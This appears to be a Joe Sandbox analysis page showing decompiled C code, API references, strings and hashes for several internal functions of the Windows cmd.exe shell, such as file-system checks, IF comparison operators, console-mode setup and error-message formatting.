Instruction ID: 5d6b12fb1bb033af4fa598c22e1ff209fcbeaabee1a8d37cfb7c6b980184ddf0
Opcode Fuzzy Hash: f3e488ecfb93dd3aec5c1f403c4c2199c608edd3db6a0fa905976274b6d2d929
Instruction Fuzzy Hash: FDD1DF71A00212CBDF34AF69D8557BAB7A5EF90304F18446AE84AE7281EB75DD84CF70

Uniqueness

Uniqueness Score: -1.00%

Function 00DAB9D3, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00DAB9D3(void* __ecx, char __edx, char _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				char _v1085;
				long _v1092;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				void* _t63;
				WCHAR* _t64;
				int _t65;
				WCHAR* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				WCHAR* _t73;
				WCHAR* _t81;
				void* _t89;
				WCHAR* _t90;
				signed int _t91;

				_t88 = __edx;
				_t41 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t41 ^ _t91;
				_v1085 = __edx;
				_t90 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t73 = 1;
				_t89 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00D90C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L27:
					_t90 = _t73;
					goto L28;
				} else {
					_t63 = _v564;
					if(_t63 == 0) {
						_t63 =  &_v1084;
					}
					__imp__GetVolumePathNameW(_t89, _t63, _v556);
					if(_t63 == 0) {
						goto L27;
					} else {
						_t64 = _v564;
						if(_t64 == 0) {
							_t64 =  &_v1084;
						}
						_t65 = GetDriveTypeW(_t64);
						if(_t65 == 0 || _t65 == 4) {
							_t73 = _t90;
							goto L27;
						} else {
							_t66 = _v28;
							if(_t66 == 0) {
								_t66 =  &_v548;
							}
							_t81 = _v564;
							if(_t81 == 0) {
								_t81 =  &_v1084;
							}
							if(GetVolumeInformationW(_t81, _t90, _t90, _t90,  &_v1092,  &_v1092, _t66, _v20) == 0) {
								goto L27;
							} else {
								_t69 = _v28;
								if(_t69 == 0) {
									_t69 =  &_v548;
								}
								__imp___wcsicmp(_t69, L"NTFS");
								if(_t69 != 0) {
									if(_a4 == 0) {
										L21:
										if(_v1085 == 0) {
											L28:
											_t73 = _t90;
										} else {
											_t70 = _v28;
											if(_t70 == 0) {
												_t70 =  &_v548;
											}
											__imp___wcsicmp(_t70, L"CSVFS");
											if(_t70 != 0) {
												goto L28;
											} else {
											}
										}
									} else {
										_t71 = _v28;
										if(_t71 == 0) {
											_t71 =  &_v548;
										}
										__imp___wcsicmp(_t71, L"REFS");
										if(_t71 != 0) {
											goto L21;
										}
									}
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v564);
				__imp__??_V@YAXPAX@Z();
				return E00D96FD0(_t73, _t73, _v8 ^ _t91, _t88, _t89, _t90, _v28);
			}

0x00dab9d3
0x00dab9de
0x00dab9e5
0x00dab9f0
0x00dab9f7
0x00dab9f9
0x00dab9fe
0x00daba07
0x00daba0a
0x00daba0c
0x00daba0f
0x00daba17
0x00daba22
0x00daba28
0x00daba37
0x00daba60
0x00dabb85
0x00dabb85
0x00000000
0x00daba90
0x00daba90
0x00daba98
0x00daba9a
0x00daba9a
0x00dabaa8
0x00dabab0
0x00000000
0x00dabab6
0x00dabab6
0x00dababe
0x00dabac0
0x00dabac0
0x00dabac7
0x00dabacf
0x00dabb83
0x00000000
0x00dabade
0x00dabade
0x00dabae3
0x00dabae5
0x00dabae5
0x00dabaeb
0x00dabaf3
0x00dabaf5
0x00dabaf5
0x00dabb13
0x00000000
0x00dabb15
0x00dabb15
0x00dabb1a
0x00dabb1c
0x00dabb1c
0x00dabb28
0x00dabb32
0x00dabb38
0x00dabb59
0x00dabb60
0x00dabb87
0x00dabb87
0x00dabb62
0x00dabb62
0x00dabb67
0x00dabb69
0x00dabb69
0x00dabb75
0x00dabb7f
0x00000000
0x00000000
0x00dabb81
0x00dabb7f
0x00dabb3a
0x00dabb3a
0x00dabb3f
0x00dabb41
0x00dabb41
0x00dabb4d
0x00dabb57
0x00000000
0x00000000
0x00dabb57
0x00dabb38
0x00dabb32
0x00dabb13
0x00dabacf
0x00dabab0
0x00dabb8f
0x00dabb99
0x00dabbb2

APIs

memset.MSVCRT ref: 00DABA0F
memset.MSVCRT ref: 00DABA37

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00DABAA8
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00DABAC7
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00DABB0B
_wcsicmp.MSVCRT ref: 00DABB28
_wcsicmp.MSVCRT ref: 00DABB4D
_wcsicmp.MSVCRT ref: 00DABB75
??_V@YAXPAX@Z.MSVCRT ref: 00DABB8F
??_V@YAXPAX@Z.MSVCRT ref: 00DABB99

Strings

NTFS, xrefs: 00DABB22
REFS, xrefs: 00DABB47
CSVFS, xrefs: 00DABB6F

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
String ID: CSVFS$NTFS$REFS
API String ID: 3510147486-2605508654
Opcode ID: f3169509a4d7f887f014fea1c8a7960039b25fbc9f955ea2670b630a33244e11
Instruction ID: 6c59272836ce3307041c79d0cefe877207fd500de8ab7a36e1a9b2e17d4cfca9
Opcode Fuzzy Hash: f3169509a4d7f887f014fea1c8a7960039b25fbc9f955ea2670b630a33244e11
Instruction Fuzzy Hash: 2A516471A042199BDF20DBA5DC89BEABBB8EF05364F0800AAF505D3141EB74DE45CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00D89520, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00D895E4
_wcsicmp.MSVCRT ref: 00D895F6
_wcsicmp.MSVCRT ref: 00D89608
_wcsicmp.MSVCRT ref: 00D8961A
_wcsicmp.MSVCRT ref: 00D8962C
_wcsicmp.MSVCRT ref: 00D89682

Strings

EQU, xrefs: 00D895DE
LSS, xrefs: 00D89602
GTR, xrefs: 00D89626
GEQ, xrefs: 00D8967C
NEQ, xrefs: 00D895F0
LEQ, xrefs: 00D89614

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmp
String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
API String ID: 2081463915-3124875276
Opcode ID: bede197c13cc37e2f6eab249c441e3a69605aa48f374d0584e60c36d643f201a
Instruction ID: a28a938fb078d2e89d7d876af1fd2465c977ce6cff1d310628b4d59958dc153b
Opcode Fuzzy Hash: bede197c13cc37e2f6eab249c441e3a69605aa48f374d0584e60c36d643f201a
Instruction Fuzzy Hash: BB41C171204702DAEB297B24EC7AB7AF7A5EB51720F1C042EE186D66D0EB72C445DB34

Uniqueness

Uniqueness Score: -1.00%

Function 00D906C0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00D906C0(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;
				void* _t16;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t28;
				signed int _t29;
				void* _t30;
				void* _t32;

				_t4 =  *0xdad0b4; // 0x35c4fbb8
				_t5 = _t4 ^ _t29;
				_v8 = _t5;
				__imp___get_osfhandle( *0xdb3880, __ecx);
				_t6 = SetConsoleMode(_t5, 1);
				__imp___get_osfhandle(0xdb3880);
				_t32 = _t30 + 8;
				_t7 = GetConsoleMode(_t6, 1);
				if(_t7 == 0) {
					L2:
					__imp___get_osfhandle(0xdb3884);
					if(GetConsoleMode(_t7, 0) != 0) {
						_t20 =  *0xdb3884;
						_t8 = _t20 & 0x00000017;
						if(_t8 != 7) {
							_t23 = _t20 & 0xffffffef | 0x00000007;
							 *0xdb3884 = _t23;
							__imp___get_osfhandle(_t23);
							_t8 = SetConsoleMode(_t8, 0);
						}
						_push(_t27);
						_t28 =  *0xdb3888;
						if(_t28 != 0) {
							 *0xdc94b4(L"CMD.EXE");
							_t8 =  *_t28();
						}
						_pop(_t27);
					}
					return E00D96FD0(_t8, _t16, _v8 ^ _t29, _t25, _t26, _t27);
				}
				_t24 =  *0xdad0e0; // 0x7
				_t25 =  *0xdb3880;
				_t7 = _t24 & _t25;
				if(_t7 != _t24) {
					_t25 = _t25 | _t24;
					 *0xdb3880 = _t25;
					__imp___get_osfhandle(_t25);
					_t32 = _t32 + 4;
					_t7 = SetConsoleMode(_t7, 1);
					if(_t7 != 0) {
						goto L2;
					}
					_t7 =  *0xdad0e0; // 0x7
					if((_t7 & 0x00000004) != 0) {
						 *0xdad0e0 = _t7 & 0xfffffffb;
						_t15 =  *0xdb3880 & 0xfffffffb;
						 *0xdb3880 = _t15;
						__imp___get_osfhandle(_t15);
						_t32 = _t32 + 4;
						_t7 = SetConsoleMode(_t15, 1);
					}
				}
				goto L2;
			}

0x00d906c6
0x00d906cb
0x00d906cd
0x00d906d8
0x00d906e2
0x00d906ef
0x00d906f5
0x00d906f9
0x00d90701
0x00d90717
0x00d9071e
0x00d90730
0x00d90732
0x00d9073a
0x00d9073f
0x00d90744
0x00d9074a
0x00d90750
0x00d9075a
0x00d9075a
0x00d90760
0x00d90761
0x00d90769
0x00d90772
0x00d90778
0x00d90778
0x00d9077a
0x00d9077a
0x00d90788
0x00d90788
0x00d90703
0x00d9070b
0x00d90711
0x00d90715
0x00d90789
0x00d9078e
0x00d90794
0x00d9079a
0x00d9079e
0x00d907a6
0x00000000
0x00000000
0x00d9cc03
0x00d9cc0a
0x00d9cc13
0x00d9cc1d
0x00d9cc23
0x00d9cc28
0x00d9cc2e
0x00d9cc32
0x00d9cc32
0x00d9cc0a
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 00D906D8
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00DA38A5), ref: 00D906E2
_get_osfhandle.MSVCRT ref: 00D906EF
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D906F9
_get_osfhandle.MSVCRT ref: 00D9071E
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D90728
_get_osfhandle.MSVCRT ref: 00D90750
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D9075A
_get_osfhandle.MSVCRT ref: 00D90794
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D9079E
_get_osfhandle.MSVCRT ref: 00D9CC28
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D9CC32

Strings

CMD.EXE, xrefs: 00D9076B

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID: CMD.EXE
API String ID: 1606018815-3025314500
Opcode ID: 39ab4e28b8d9bb05b62b5bc81fd233073a42114903f16bf925213483f0c1d327
Instruction ID: 7bbc27f9b185698d7cfce86dbaee0d8e0c6cf6b919f07f41286dfc3f417cce79
Opcode Fuzzy Hash: 39ab4e28b8d9bb05b62b5bc81fd233073a42114903f16bf925213483f0c1d327
Instruction Fuzzy Hash: 103182B1600702EFDF149BA8FC1EF257BA4AB40715B080628F407D73E0DB75A905AB76

Uniqueness

Uniqueness Score: -1.00%

Function 00D89835, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00D89835(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* __ebp;
				intOrPtr _t76;
				intOrPtr _t87;
				intOrPtr _t90;
				signed int _t91;
				signed char _t103;
				signed int _t107;
				intOrPtr _t108;
				signed int _t125;
				signed int _t144;
				intOrPtr* _t179;
				void* _t182;

				_t153 = __edx;
				_t123 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t179 = __ecx;
				_t114 = 0;
				_t182 = __edx;
				_v8 = 0;
				_t76 =  *__ecx;
				if(_t76 > 0x37) {
					__eflags = _t76 - 0x38;
					if(__eflags == 0) {
						E00D89899(0, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						L78:
						_t125 =  *(_t179 + 0x3c);
						L79:
						E00D89835(_t125, _t182, _a4);
						L7:
						return 0;
					}
					if(__eflags <= 0) {
						L54:
						__imp__longjmp(0xdbb8f8, 0xffffffff);
						L55:
						E00D89899(_t114, _a4, "(", _t114);
						_v8 = ")";
						L60:
						E00D89835( *((intOrPtr*)(_t179 + 0x38)), _t182, _a4);
						E00D89899(_t114, _a4, _v8, _t114);
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L7;
						}
						__eflags =  *_t179 - 0x3b;
						if( *_t179 == 0x3b) {
							goto L7;
						}
						goto L78;
					}
					__eflags = _t76 - 0x3a;
					if(_t76 <= 0x3a) {
						_v8 = L"== ";
						__eflags =  *0xdc3cc9;
						if( *0xdc3cc9 != 0) {
							_t87 =  *((intOrPtr*)(__ecx + 0x44));
							__eflags = _t87 - 1;
							if(_t87 != 1) {
								__eflags = _t87 - 2;
								if(_t87 != 2) {
									__eflags = _t87 - 3;
									if(_t87 != 3) {
										__eflags = _t87 - 4;
										if(_t87 != 4) {
											__eflags = _t87 - 5;
											if(_t87 != 5) {
												__eflags = _t87 - 6;
												if(_t87 == 6) {
													_v8 = L"GEQ ";
												}
											} else {
												_v8 = L"GTR ";
											}
										} else {
											_v8 = L"LEQ ";
										}
									} else {
										_v8 = L"LSS ";
									}
								} else {
									_v8 = L"NEQ ";
								}
							} else {
								_v8 = L"EQU ";
							}
						}
						E00D89899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)), 1);
						_t114 = 0;
						_push(0);
						_push(_v8);
						L4:
						E00D89899(_t114, _a4);
						if( *(_t179 + 0x3c) != _t114) {
							E00D89899(_t114, _a4,  *(_t179 + 0x3c), _t114);
						}
						E00D89CA6(_t179, _t182, _a4);
						goto L7;
					}
					__eflags = _t76 - 0x3b;
					if(_t76 == 0x3b) {
						L13:
						E00D89CA6(_t123, _t153, _a4);
						_t114 = 1;
						__eflags =  *_t179 - 0x2e;
						if( *_t179 < 0x2e) {
							goto L60;
						}
						__eflags =  *_t179 - 0x2f;
						if( *_t179 <= 0x2f) {
							_v8 = "&";
							goto L60;
						}
						__eflags =  *_t179 - 0x30;
						if( *_t179 == 0x30) {
							_v8 = L"||";
							goto L60;
						}
						__eflags =  *_t179 - 0x31;
						if( *_t179 == 0x31) {
							_v8 = L"&&";
							goto L60;
						}
						__eflags =  *_t179 - 0x32;
						if( *_t179 == 0x32) {
							_v8 = "|";
							goto L60;
						}
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L55;
						} else {
							__eflags =  *_t179 - 0x3b;
							if( *_t179 == 0x3b) {
								E00D89899(1, _a4, "@", 1);
								_v8 = " ";
							}
							goto L60;
						}
					}
					__eflags = _t76 - 0x3c;
					if(_t76 != 0x3c) {
						goto L54;
					}
					_t90 =  *0xdc8510;
					__eflags = _t90 - 0x2396;
					if(_t90 != 0x2396) {
						__eflags = _t90 - 0x2395;
						if(_t90 != 0x2395) {
							__eflags = _t90 - 0x2390;
							if(_t90 != 0x2390) {
								goto L54;
							}
							_t91 = L"REM /?";
							L53:
							E00D89899(_t114, _a4, _t91, 1);
							goto L7;
						}
						_t91 = L"IF /?";
						goto L53;
					}
					_t91 = L"FOR /?";
					goto L53;
				}
				if(_t76 >= 0x34 || _t76 == 0) {
					L3:
					_push(1);
					_push( *((intOrPtr*)(_t179 + 0x38)));
					goto L4;
				} else {
					__eflags = _t76 - 0x2b;
					if(_t76 == 0x2b) {
						E00D89899(1, _a4, L"FOR", 1);
						__eflags =  *0xdc3cc9;
						if( *0xdc3cc9 == 0) {
							L41:
							E00D89899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 6, 1);
							E00D89899(1, _a4, "(", 1);
							E00D89899(1, _a4,  *(_t179 + 0x3c), 0);
							E00D89899(1, _a4, ")", 0);
							E00D89899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 0x2c, 1);
							_t125 =  *(_t179 + 0x40);
							goto L79;
						}
						_t103 =  *(__ecx + 0x48);
						__eflags = 1 & _t103;
						if((1 & _t103) == 0) {
							__eflags = _t103 & 0x00000002;
							if((_t103 & 0x00000002) == 0) {
								__eflags = _t103 & 0x00000008;
								if((_t103 & 0x00000008) == 0) {
									__eflags = _t103 & 0x00000004;
									if((_t103 & 0x00000004) == 0) {
										goto L41;
									}
									_push(1);
									_push(L"/R");
									L38:
									E00D89899(1, _a4);
									__eflags =  *(_t179 + 0x4c);
									if( *(_t179 + 0x4c) == 0) {
										goto L41;
									}
									_push(1);
									_push( *(_t179 + 0x4c));
									goto L40;
								}
								_push(1);
								_push(L"/F");
								goto L38;
							}
							_push(1);
							_push(L"/D");
							goto L40;
						} else {
							_push(1);
							_push(L"/L");
							L40:
							E00D89899(1, _a4);
							goto L41;
						}
					}
					__eflags = _t76 - 0x2c;
					if(_t76 == 0x2c) {
						E00D89899(1, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						_t107 =  *(__ecx + 0x3c);
						_t144 = 0;
						__eflags =  *_t107 - 0x38;
						if( *_t107 == 0x38) {
							_t108 =  *((intOrPtr*)(_t107 + 0x3c));
							__eflags =  *((intOrPtr*)(_t108 + 0x40)) - 2;
							_t107 =  *(__ecx + 0x3c);
							if( *((intOrPtr*)(_t108 + 0x40)) == 2) {
								_t144 = L"/I";
							}
						} else {
							asm("sbb ecx, ecx");
							_t144 =  !( ~( *((intOrPtr*)(_t107 + 0x40)) - 2)) & L"/I";
						}
						__eflags = _t144;
						if(_t144 != 0) {
							E00D89899(1, _a4, _t144, 1);
							_t107 =  *(_t179 + 0x3c);
						}
						E00D89835(_t107, _t182, _a4);
						E00D89835( *(_t179 + 0x40), _t182, _a4);
						__eflags =  *(_t179 + 0x48);
						if( *(_t179 + 0x48) == 0) {
							goto L7;
						} else {
							E00D89899(1, _a4,  *((intOrPtr*)(_t179 + 0x44)), 1);
							_t125 =  *(_t179 + 0x48);
							goto L79;
						}
					}
					__eflags = _t76 - 0x2d;
					if(__eflags == 0) {
						goto L3;
					}
					if(__eflags <= 0) {
						goto L54;
					}
					__eflags = _t76 - 0x33;
					if(_t76 > 0x33) {
						goto L54;
					}
					goto L13;
				}
			}

0x00d89835
0x00d89835
0x00d8983a
0x00d8983b
0x00d8983f
0x00d89841
0x00d89843
0x00d89845
0x00d89848
0x00d8984d
0x00da0ed1
0x00da0ed4
0x00da1036
0x00da103b
0x00da103b
0x00da103e
0x00da1043
0x00d8988e
0x00d89896
0x00d89896
0x00da0eda
0x00da0f32
0x00da0f39
0x00da0f3f
0x00da0f4a
0x00da0f4f
0x00da0f7a
0x00da0f82
0x00da0f90
0x00da0f95
0x00da0f98
0x00000000
0x00000000
0x00da0f9e
0x00da0fa1
0x00000000
0x00000000
0x00000000
0x00da0fa7
0x00da0edc
0x00da0edf
0x00da0fae
0x00da0fb6
0x00da0fbd
0x00da0fbf
0x00da0fc2
0x00da0fc4
0x00da0fcf
0x00da0fd2
0x00da0fdd
0x00da0fe0
0x00da0feb
0x00da0fee
0x00da0ff9
0x00da0ffc
0x00da1007
0x00da100a
0x00da100c
0x00da100c
0x00da0ffe
0x00da0ffe
0x00da0ffe
0x00da0ff0
0x00da0ff0
0x00da0ff0
0x00da0fe2
0x00da0fe2
0x00da0fe2
0x00da0fd4
0x00da0fd4
0x00da0fd4
0x00da0fc6
0x00da0fc6
0x00da0fc6
0x00da0fc4
0x00da101c
0x00da1021
0x00da1023
0x00da1024
0x00d89865
0x00d8986a
0x00d89872
0x00d8987d
0x00d8987d
0x00d89889
0x00000000
0x00d89889
0x00da0ee5
0x00da0ee8
0x00da0d18
0x00da0d1b
0x00da0d22
0x00da0d23
0x00da0d26
0x00000000
0x00000000
0x00da0d2c
0x00da0d2f
0x00da0f73
0x00000000
0x00da0f73
0x00da0d35
0x00da0d38
0x00da0f6a
0x00000000
0x00da0f6a
0x00da0d3e
0x00da0d41
0x00da0f61
0x00000000
0x00da0f61
0x00da0d47
0x00da0d4a
0x00da0f58
0x00000000
0x00da0f58
0x00da0d50
0x00da0d53
0x00000000
0x00da0d59
0x00da0d59
0x00da0d5c
0x00da0d6d
0x00da0d72
0x00da0d72
0x00000000
0x00da0d5c
0x00da0d53
0x00da0eee
0x00da0ef1
0x00000000
0x00000000
0x00da0ef3
0x00da0ef8
0x00da0efd
0x00da0f06
0x00da0f0b
0x00da0f14
0x00da0f19
0x00000000
0x00000000
0x00da0f1b
0x00da0f20
0x00da0f28
0x00000000
0x00da0f28
0x00da0f0d
0x00000000
0x00da0f0d
0x00da0eff
0x00000000
0x00da0eff
0x00d89856
0x00d89860
0x00d89860
0x00d89862
0x00000000
0x00da0cf2
0x00da0cf2
0x00da0cf5
0x00da0e18
0x00da0e1d
0x00da0e24
0x00da0e75
0x00da0e82
0x00da0e92
0x00da0ea1
0x00da0eb2
0x00da0ec4
0x00da0ec9
0x00000000
0x00da0ec9
0x00da0e26
0x00da0e29
0x00da0e2b
0x00da0e35
0x00da0e37
0x00da0e41
0x00da0e43
0x00da0e4d
0x00da0e4f
0x00000000
0x00000000
0x00da0e51
0x00da0e52
0x00da0e57
0x00da0e5c
0x00da0e61
0x00da0e65
0x00000000
0x00000000
0x00da0e67
0x00da0e68
0x00000000
0x00da0e68
0x00da0e45
0x00da0e46
0x00000000
0x00da0e46
0x00da0e39
0x00da0e3a
0x00000000
0x00da0e2d
0x00da0e2d
0x00da0e2e
0x00da0e6b
0x00da0e70
0x00000000
0x00da0e70
0x00da0e2b
0x00da0cfb
0x00da0cfe
0x00da0d8a
0x00da0d8f
0x00da0d92
0x00da0d94
0x00da0d97
0x00da0dad
0x00da0db0
0x00da0db4
0x00da0db7
0x00da0db9
0x00da0db9
0x00da0d99
0x00da0da1
0x00da0da5
0x00da0da5
0x00da0dbe
0x00da0dc0
0x00da0dc9
0x00da0dce
0x00da0dce
0x00da0dd8
0x00da0de5
0x00da0dea
0x00da0dee
0x00000000
0x00da0df4
0x00da0dfd
0x00da0e02
0x00000000
0x00da0e02
0x00da0dee
0x00da0d00
0x00da0d03
0x00000000
0x00000000
0x00da0d09
0x00000000
0x00000000
0x00da0d0f
0x00da0d12
0x00000000
0x00000000
0x00000000
0x00da0d12

Strings

FOR /?, xrefs: 00DA0EFF
GTR , xrefs: 00DA0FFE
EQU , xrefs: 00DA0FC6
NEQ , xrefs: 00DA0FD4
IF /?, xrefs: 00DA0F0D, 00DA0F27
REM /?, xrefs: 00DA0F1B
LEQ , xrefs: 00DA0FF0
LSS , xrefs: 00DA0FE2
GEQ , xrefs: 00DA100C
FOR, xrefs: 00DA0E13
== , xrefs: 00DA0FAE

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID:
String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
API String ID: 0-366822981
Opcode ID: 9e307fb12d04a1cbe96abdf94df7f1f585ef6cfb566a56d96651230a5d4b6924
Instruction ID: 36819dee805b0ed52d29751fa8c02270c1f9a93fbd5e7cae696f5071e87bcade
Opcode Fuzzy Hash: 9e307fb12d04a1cbe96abdf94df7f1f585ef6cfb566a56d96651230a5d4b6924
Instruction Fuzzy Hash: 97A1DE70600206FFCF28AE55C8A597ABF36EF82790B288015F4865B350C771DE91DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D8C6F4, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 147
windowCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00D8C6F4(long __ecx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				char _v40;
				short _v104;
				void* _v108;
				long _v112;
				char* _v116;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				signed int _t26;
				char* _t31;
				void* _t37;
				char* _t45;
				intOrPtr _t48;
				WCHAR* _t55;
				void* _t56;
				signed int _t57;
				signed int _t59;
				long _t60;
				void* _t61;
				int _t62;
				signed int _t63;

				_t22 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t22 ^ _t63;
				_t47 = _a8;
				_t60 = __ecx;
				_v108 = _a8;
				_t62 = 0;
				_v112 = __ecx;
				if(__ecx == 0x13d || FormatMessageW(0x1a00, 0, __ecx, 0, 0xdbb980, 0x2000, 0) == 0) {
					__imp___ultoa(_t60,  &_v40, 0x10);
					_t26 = E00D90638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(_t62,  ~( ~_t26),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v120 =  &_v104;
					_t31 = L"Application";
					if(_t60 < 0x2328) {
						_t31 = L"System";
					}
					_v116 = _t31;
					_push( &_v120);
					_push(0x2000);
					_push(0xdbb980);
					_push(_t62);
					_push(0x13d);
					_push(_t62);
					_push(0x3000);
					goto L6;
				} else {
					_t55 = 0xdbb980;
					_t48 = 0x25;
					while(1) {
						_t58 = _t48;
						_t37 = E00D8D7D4(_t55, _t48);
						_t56 = _t37;
						if(_t56 == 0) {
							break;
						}
						_t55 = _t56 + 2;
						_t59 =  *_t55 & 0x0000ffff;
						if(_t59 - 0x31 > 8) {
							if(_t59 == _t48) {
								_t55 =  &(_t55[1]);
							}
						} else {
							_t62 = _t62 + 1;
						}
					}
					_t47 = _v108;
					if(_t62 > _a4) {
						_t47 = HeapAlloc(GetProcessHeap(), 0, _t62 << 2);
						if(_t47 == 0) {
							L8:
							return E00D96FD0(_t34, _t47, _v8 ^ _t63, _t58, _t60, _t62);
						}
						_t57 = 0;
						if(_t62 == 0) {
							L21:
							_t62 = FormatMessageW(0x3800, 0, _t60, 0, 0xdbb980, 0x2000, _t47);
							RtlFreeHeap(GetProcessHeap(), 0, _t47);
							L7:
							_t34 = _t62;
							goto L8;
						}
						_t61 = _v108;
						_t58 = _a4;
						do {
							if(_t57 >= _t58) {
								_t45 = " ";
							} else {
								 *_t61 =  *_t61 + 4;
								_t45 =  *( *_t61 - 4);
							}
							 *(_t47 + _t57 * 4) = _t45;
							_t57 = _t57 + 1;
						} while (_t57 < _t62);
						_t60 = _v112;
						goto L21;
					}
					_push(_t47);
					_push(0x2000);
					_push(0xdbb980);
					_push(_t37);
					_push(_t60);
					_push(_t37);
					_push(0x1800);
					L6:
					_t62 = FormatMessageW();
					goto L7;
				}
			}

0x00d8c6fc
0x00d8c703
0x00d8c707
0x00d8c70c
0x00d8c70e
0x00d8c711
0x00d8c713
0x00d8c71c
0x00d9af0e
0x00d9af1f
0x00d9af2e
0x00d9af38
0x00d9af41
0x00d9af44
0x00d9af4f
0x00d9af51
0x00d9af51
0x00d9af56
0x00d9af5c
0x00d9af5d
0x00d9af62
0x00d9af67
0x00d9af68
0x00d9af6d
0x00d9af6e
0x00000000
0x00d8c743
0x00d8c745
0x00d8c74a
0x00d8c74b
0x00d8c74b
0x00d8c74d
0x00d8c752
0x00d8c756
0x00000000
0x00000000
0x00d8c794
0x00d8c797
0x00d8c7a1
0x00d9ae7e
0x00d9ae84
0x00d9ae84
0x00d8c7a7
0x00d8c7a7
0x00d8c7a7
0x00d8c7a1
0x00d8c758
0x00d8c75e
0x00d9aea1
0x00d9aea5
0x00d8c781
0x00d8c791
0x00d8c791
0x00d9aeab
0x00d9aeaf
0x00d9aed5
0x00d9aef3
0x00d9aefc
